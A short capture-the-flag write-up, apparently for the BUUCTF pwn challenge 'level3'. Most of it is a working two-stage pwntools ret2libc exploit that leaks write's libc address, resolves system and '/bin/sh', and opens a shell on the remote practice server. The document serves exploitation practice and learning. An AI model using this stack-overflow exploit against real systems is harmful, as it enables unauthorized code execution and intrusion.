保护
ida
程序里没有 system 和 /bin/sh，典型 ret2libc（先泄露一个 libc 函数地址，再返回到 libc 里的 system）
exp
# Two-stage ret2libc exploit for the "level3" target described in the notes above
# (the author notes the binary has neither system() nor "/bin/sh", so both are
# taken from libc). The script is strictly sequential and stateful: every
# send/recv below must happen in this order against the live process.
from pwn import*
from LibcSearcher3 import*
# Verbose I/O logging so the raw leak bytes can be inspected if stage 2 fails.
context.log_level="debug"
# Hard-coded local copy of the binary; it is only used for the PLT/GOT/symbol
# lookups below, the process actually driven is the remote one.
elf=ELF("/home/error/桌面/level3")
#i=process("/home/error/桌面/level3")
i=remote("node4.buuoj.cn",27813)
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# These are used as absolute addresses in the payload, which only works if the
# binary is loaded at a fixed address (no PIE) — confirm against the protection
# check mentioned above.
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=elf.symbols["main"]
# Stage 1: overwrite the saved return address with write@plt so the program
# calls write(1, &write@got, 4) and leaks libc's write address, then returns
# to main so a second payload can be sent. 0x88+4 is presumably the distance
# from the buffer to the saved return address (0x88 to the saved frame pointer,
# plus 4 for it) — confirm in IDA.
# Layout after the padding: [write@plt][return-to = main][fd=1][buf=write@got][len=4].
p1=cyclic(0x88+4)+flat([write_plt,main,1,write_got,4])# note: write takes three arguments
i.sendlineafter("Input:\n",p1)
# Exactly 4 bytes come back: the 32-bit runtime address of write in libc.
write_addr=u32(i.recv(4))
print(hex(write_addr))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# Identify the libc build from the leaked address, then derive the base and the
# system / "/bin/sh" addresses from that same build's offsets. If the selected
# build differs from the one the remote actually runs, stage 2 silently fails.
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
sh_addr=libc_base+libc.dump("str_bin_sh")
# Stage 2: same overflow, now returning into system("/bin/sh"). The 0 is the
# dummy return address system() would return to; the shell is never returned from.
p2=cyclic(0x88+4)+flat([sys_addr,0,sh_addr])
i.sendlineafter("Input:\n",p2)
i.interactive()
不知道为什么用 LibcSearcher 时远端和本地的 libc 版本不一样，本地打得通远端打不通，换成 LibcSearcher3 才打通远端。（推测：只凭 write 地址的低位匹配时可能命中多个 libc 版本，搜库选到的版本与远端实际用的不一致。）